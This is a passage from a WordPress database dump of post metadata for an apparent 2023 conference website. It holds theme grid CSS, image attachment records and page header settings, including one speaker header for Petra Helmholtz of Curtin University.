}\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(22565,3446,'_wp_attached_file','2022/12/w24m-1.jpg'),
(22566,3446,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:501;s:6:\"height\";i:304;s:4:\"file\";s:18:\"2022/12/w24m-1.jpg\";s:8:\"filesize\";i:89709;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"w24m-1-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9691;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"w24m-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5290;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(22567,3449,'_edit_lock','1675608364:1'),
(22568,3450,'_wp_attached_file','2022/12/w25m1.jpg'),
(22569,3450,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2120;s:6:\"height\";i:2049;s:4:\"file\";s:17:\"2022/12/w25m1.jpg\";s:8:\"filesize\";i:366188;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w25m1-300x290.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20431;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"w25m1-1024x990.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:990;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142817;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w25m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7071;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"w25m1-768x742.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:742;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91619;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"w25m1-1536x1485.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1485;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:261532;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:19:\"w25m1-2048x1979.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1979;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:403526;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w25m1-500x483.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46469;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"w25m1-800x773.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:773;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97748;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:19:\"w25m1-1280x1237.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1237;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199637;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:19:\"w25m1-1920x1856.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1856;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:365912;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(22570,3449,'_thumbnail_id','3450'),
(22571,3449,'_edit_last','1'),
(22572,3449,'_wpb_vc_js_status','true'),
(22573,3449,'_dt_sidebar_position','disabled'),
(22574,3449,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22575,3449,'_dt_sidebar_hide_on_mobile','0'),
(22576,3449,'_dt_footer_show','1'),
(22577,3449,'_dt_footer_widgetarea_id','sidebar_2'),
(22578,3449,'_dt_footer_hide_on_mobile','0'),
(22579,3449,'_dt_header_title','fancy'),
(22580,3449,'_dt_header_background','normal'),
(22581,3449,'_dt_header_background_below_slideshow','disabled'),
(22582,3449,'_dt_header_transparent_bg_color_scheme','light'),
(22583,3449,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22584,3449,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22585,3449,'_dt_header_transparent_bg_color','#000000'),
(22586,3449,'_dt_header_transparent_bg_opacity','50'),
(22587,3449,'_dt_header_disabled_background','normal'),
(22588,3449,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22589,3449,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22590,3449,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22591,3449,'_dt_header_disabled_transparent_bg_color','#000000'),
(22592,3449,'_dt_header_disabled_transparent_bg_opacity','50'),
(22593,3449,'_dt_page_overrides_top_margin',''),
(22594,3449,'_dt_page_overrides_right_margin',''),
(22595,3449,'_dt_page_overrides_bottom_margin',''),
(22596,3449,'_dt_page_overrides_left_margin',''),
(22597,3449,'_dt_mobile_page_padding_top',''),
(22598,3449,'_dt_mobile_page_padding_right',''),
(22599,3449,'_dt_mobile_page_padding_bottom',''),
(22600,3449,'_dt_mobile_page_padding_left',''),
(22601,3449,'_dt_fancy_header_layout_heading',''),
(22602,3449,'_dt_fancy_header_title_aligment','center'),
(22603,3449,'_dt_fancy_header_height','300'),
(22604,3449,'_dt_fancy_header_padding-top','0px'),
(22605,3449,'_dt_fancy_header_padding-bottom','0px'),
(22606,3449,'_dt_fancy_header_breadcrumbs_heading',''),
(22607,3449,'_dt_fancy_header_breadcrumbs','disabled'),
(22608,3449,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22609,3449,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22610,3449,'_dt_fancy_header_title_heading',''),
(22611,3449,'_dt_fancy_header_title_mode','custom'),
(22612,3449,'_dt_fancy_header_title',''),
(22613,3449,'_dt_fancy_header_title_font_size','30'),
(22614,3449,'_dt_fancy_header_title_line_height','36'),
(22615,3449,'_dt_fancy_header_text_transform','none'),
(22616,3449,'_dt_fancy_header_title_color_mode','color'),
(22617,3449,'_dt_fancy_header_title_color','#ffffff'),
(22618,3449,'_dt_fancy_header_subtitle_heading',''),
(22619,3449,'_dt_fancy_header_subtitle',''),
(22620,3449,'_dt_fancy_header_subtitle_font_size','18'),
(22621,3449,'_dt_fancy_header_subtitle_line_height','26'),
(22622,3449,'_dt_fancy_header_subtitle_text_transform','none'),
(22623,3449,'_dt_fancy_header_subtitle_color_mode','color'),
(22624,3449,'_dt_fancy_header_subtitle_color','#ffffff'),
(22625,3449,'_dt_fancy_header_bg_heading',''),
(22626,3449,'_dt_fancy_header_bg_color','#222222'),
(22627,3449,'_dt_fancy_header_bg_image_origin','featured_image'),
(22628,3449,'_dt_fancy_header_bg_image','a:0:{}'),
(22629,3449,'_dt_fancy_header_bg_repeat','no-repeat'),
(22630,3449,'_dt_fancy_header_bg_position_x','center'),
(22631,3449,'_dt_fancy_header_bg_position_y','center'),
(22632,3449,'_dt_fancy_header_bg_fullscreen','1'),
(22633,3449,'_dt_fancy_header_bg_overlay','0'),
(22634,3449,'_dt_fancy_header_overlay_color','#000'),
(22635,3449,'_dt_fancy_header_bg_overlay_opacity','50'),
(22636,3449,'_dt_fancy_header_scroll_effect','default'),
(22637,3449,'_dt_fancy_header_bg_parallax','0.5'),
(22638,3449,'_dt_fancy_header_responsiveness_heading',''),
(22639,3449,'_dt_fancy_header_responsiveness','enabled'),
(22640,3449,'_dt_fancy_header_responsiveness_switch','778px'),
(22641,3449,'_dt_fancy_header_responsive_height','70'),
(22642,3449,'_dt_fancy_header_responsive_font_size','30'),
(22643,3449,'_dt_fancy_header_responsive_title_line_height','38'),
(22644,3449,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22645,3449,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22646,3449,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22647,3449,'_dt_project_options_back_button',''),
(22648,3449,'_dt_project_options_show_link',''),
(22649,3449,'_dt_project_options_link',''),
(22650,3449,'_dt_project_options_link_target',''),
(22651,3449,'_dt_project_options_link_name',''),
(22652,3449,'_dt_project_options_hide_thumbnail','1'),
(22653,3449,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(22654,3449,'_dt_project_options_related_mode','same'),
(22655,3449,'_dt_project_options_preview','normal'),
(22656,3449,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/12/w25m1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22657,3452,'_edit_lock','1675608628:1'),
(22658,3453,'_wp_attached_file','2022/12/w26m1.jpg'),
(22659,3453,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:702;s:6:\"height\";i:395;s:4:\"file\";s:17:\"2022/12/w26m1.jpg\";s:8:\"filesize\";i:65645;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w26m1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10471;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w26m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7204;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w26m1-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23802;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(22660,3452,'_thumbnail_id','3453'),
(22661,3452,'_edit_last','1'),
(22662,3452,'_wpb_vc_js_status','true'),
(22663,3452,'_dt_sidebar_position','disabled'),
(22664,3452,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22665,3452,'_dt_sidebar_hide_on_mobile','0'),
(22666,3452,'_dt_footer_show','1'),
(22667,3452,'_dt_footer_widgetarea_id','sidebar_2'),
(22668,3452,'_dt_footer_hide_on_mobile','0'),
(22669,3452,'_dt_header_title','fancy'),
(22670,3452,'_dt_header_background','normal'),
(22671,3452,'_dt_header_background_below_slideshow','disabled'),
(22672,3452,'_dt_header_transparent_bg_color_scheme','light'),
(22673,3452,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22674,3452,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22675,3452,'_dt_header_transparent_bg_color','#000000'),
(22676,3452,'_dt_header_transparent_bg_opacity','50'),
(22677,3452,'_dt_header_disabled_background','normal'),
(22678,3452,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22679,3452,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22680,3452,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22681,3452,'_dt_header_disabled_transparent_bg_color','#000000'),
(22682,3452,'_dt_header_disabled_transparent_bg_opacity','50'),
(22683,3452,'_dt_page_overrides_top_margin',''),
(22684,3452,'_dt_page_overrides_right_margin',''),
(22685,3452,'_dt_page_overrides_bottom_margin',''),
(22686,3452,'_dt_page_overrides_left_margin',''),
(22687,3452,'_dt_mobile_page_padding_top',''),
(22688,3452,'_dt_mobile_page_padding_right',''),
(22689,3452,'_dt_mobile_page_padding_bottom',''),
(22690,3452,'_dt_mobile_page_padding_left',''),
(22691,3452,'_dt_fancy_header_layout_heading',''),
(22692,3452,'_dt_fancy_header_title_aligment','center'),
(22693,3452,'_dt_fancy_header_height','300'),
(22694,3452,'_dt_fancy_header_padding-top','0px'),
(22695,3452,'_dt_fancy_header_padding-bottom','0px'),
(22696,3452,'_dt_fancy_header_breadcrumbs_heading',''),
(22697,3452,'_dt_fancy_header_breadcrumbs','disabled'),
(22698,3452,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22699,3452,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22700,3452,'_dt_fancy_header_title_heading',''),
(22701,3452,'_dt_fancy_header_title_mode','custom'),
(22702,3452,'_dt_fancy_header_title',''),
(22703,3452,'_dt_fancy_header_title_font_size','30'),
(22704,3452,'_dt_fancy_header_title_line_height','36'),
(22705,3452,'_dt_fancy_header_text_transform','none'),
(22706,3452,'_dt_fancy_header_title_color_mode','color'),
(22707,3452,'_dt_fancy_header_title_color','#fca83a'),
(22708,3452,'_dt_fancy_header_subtitle_heading',''),
(22709,3452,'_dt_fancy_header_subtitle',''),
(22710,3452,'_dt_fancy_header_subtitle_font_size','18'),
(22711,3452,'_dt_fancy_header_subtitle_line_height','26'),
(22712,3452,'_dt_fancy_header_subtitle_text_transform','none'),
(22713,3452,'_dt_fancy_header_subtitle_color_mode','color'),
(22714,3452,'_dt_fancy_header_subtitle_color','#ffffff'),
(22715,3452,'_dt_fancy_header_bg_heading',''),
(22716,3452,'_dt_fancy_header_bg_color','#222222'),
(22717,3452,'_dt_fancy_header_bg_image_origin','featured_image'),
(22718,3452,'_dt_fancy_header_bg_image','a:0:{}'),
(22719,3452,'_dt_fancy_header_bg_repeat','no-repeat'),
(22720,3452,'_dt_fancy_header_bg_position_x','center'),
(22721,3452,'_dt_fancy_header_bg_position_y','center'),
(22722,3452,'_dt_fancy_header_bg_fullscreen','1'),
(22723,3452,'_dt_fancy_header_bg_overlay','0'),
(22724,3452,'_dt_fancy_header_overlay_color','#000'),
(22725,3452,'_dt_fancy_header_bg_overlay_opacity','50'),
(22726,3452,'_dt_fancy_header_scroll_effect','default'),
(22727,3452,'_dt_fancy_header_bg_parallax','0.5'),
(22728,3452,'_dt_fancy_header_responsiveness_heading',''),
(22729,3452,'_dt_fancy_header_responsiveness','enabled'),
(22730,3452,'_dt_fancy_header_responsiveness_switch','778px'),
(22731,3452,'_dt_fancy_header_responsive_height','70'),
(22732,3452,'_dt_fancy_header_responsive_font_size','30'),
(22733,3452,'_dt_fancy_header_responsive_title_line_height','38'),
(22734,3452,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22735,3452,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22736,3452,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22737,3452,'_dt_project_options_back_button',''),
(22738,3452,'_dt_project_options_show_link',''),
(22739,3452,'_dt_project_options_link',''),
(22740,3452,'_dt_project_options_link_target',''),
(22741,3452,'_dt_project_options_link_name',''),
(22742,3452,'_dt_project_options_hide_thumbnail','1'),
(22743,3452,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(22744,3452,'_dt_project_options_related_mode','same'),
(22745,3452,'_dt_project_options_preview','normal'),
(22746,3452,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/12/w26m1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #fca83a;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22747,3455,'_edit_lock','1671198790:1'),
(22748,3455,'_edit_last','1'),
(22749,3455,'_dt_sidebar_position','disabled'),
(22750,3455,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22751,3455,'_dt_sidebar_hide_on_mobile','0'),
(22752,3455,'_dt_footer_show','1'),
(22753,3455,'_dt_footer_widgetarea_id','sidebar_2'),
(22754,3455,'_dt_footer_hide_on_mobile','0'),
(22755,3455,'_dt_header_title','fancy'),
(22756,3455,'_dt_header_background','normal'),
(22757,3455,'_dt_header_background_below_slideshow','disabled'),
(22758,3455,'_dt_header_transparent_bg_color_scheme','light'),
(22759,3455,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22760,3455,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22761,3455,'_dt_header_transparent_bg_color','#000000'),
(22762,3455,'_dt_header_transparent_bg_opacity','50'),
(22763,3455,'_dt_header_disabled_background','normal'),
(22764,3455,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22765,3455,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22766,3455,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22767,3455,'_dt_header_disabled_transparent_bg_color','#000000'),
(22768,3455,'_dt_header_disabled_transparent_bg_opacity','50'),
(22769,3455,'_dt_page_overrides_top_margin',''),
(22770,3455,'_dt_page_overrides_right_margin',''),
(22771,3455,'_dt_page_overrides_bottom_margin',''),
(22772,3455,'_dt_page_overrides_left_margin',''),
(22773,3455,'_dt_mobile_page_padding_top',''),
(22774,3455,'_dt_mobile_page_padding_right',''),
(22775,3455,'_dt_mobile_page_padding_bottom',''),
(22776,3455,'_dt_mobile_page_padding_left',''),
(22777,3455,'_dt_fancy_header_layout_heading',''),
(22778,3455,'_dt_fancy_header_title_aligment','center'),
(22779,3455,'_dt_fancy_header_height','300'),
(22780,3455,'_dt_fancy_header_padding-top','0px'),
(22781,3455,'_dt_fancy_header_padding-bottom','0px'),
(22782,3455,'_dt_fancy_header_breadcrumbs_heading',''),
(22783,3455,'_dt_fancy_header_breadcrumbs','disabled'),
(22784,3455,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22785,3455,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22786,3455,'_dt_fancy_header_title_heading',''),
(22787,3455,'_dt_fancy_header_title_mode','custom'),
(22788,3455,'_dt_fancy_header_title','Petra Helmholtz'),
(22789,3455,'_dt_fancy_header_title_font_size','30'),
(22790,3455,'_dt_fancy_header_title_line_height','36'),
(22791,3455,'_dt_fancy_header_text_transform','none'),
(22792,3455,'_dt_fancy_header_title_color_mode','color'),
(22793,3455,'_dt_fancy_header_title_color','#ffffff'),
(22794,3455,'_dt_fancy_header_subtitle_heading',''),
(22795,3455,'_dt_fancy_header_subtitle','Curtin University, Australia'),
(22796,3455,'_dt_fancy_header_subtitle_font_size','18'),
(22797,3455,'_dt_fancy_header_subtitle_line_height','26'),
(22798,3455,'_dt_fancy_header_subtitle_text_transform','none'),
(22799,3455,'_dt_fancy_header_subtitle_color_mode','color'),
(22800,3455,'_dt_fancy_header_subtitle_color','#ffffff'),
(22801,3455,'_dt_fancy_header_bg_heading',''),
(22802,3455,'_dt_fancy_header_bg_color','#222222'),
(22803,3455,'_dt_fancy_header_bg_image_origin','custom'),
(22804,3455,'_dt_fancy_header_bg_image','a:0:{}'),
(22805,3455,'_dt_fancy_header_bg_repeat','no-repeat'),
(22806,3455,'_dt_fancy_header_bg_position_x','center'),
(22807,3455,'_dt_fancy_header_bg_position_y','center'),
(22808,3455,'_dt_fancy_header_bg_fullscreen','1'),
(22809,3455,'_dt_fancy_header_bg_overlay','0'),
(22810,3455,'_dt_fancy_header_overlay_color','#000'),
(22811,3455,'_dt_fancy_header_bg_overlay_opacity','50'),
(22812,3455,'_dt_fancy_header_scroll_effect','default'),
(22813,3455,'_dt_fancy_header_bg_parallax','0.5'),
(22814,3455,'_dt_fancy_header_responsiveness_heading',''),
(22815,3455,'_dt_fancy_header_responsiveness','enabled'),
(22816,3455,'_dt_fancy_header_responsiveness_switch','778px'),
(22817,3455,'_dt_fancy_header_responsive_height','70'),
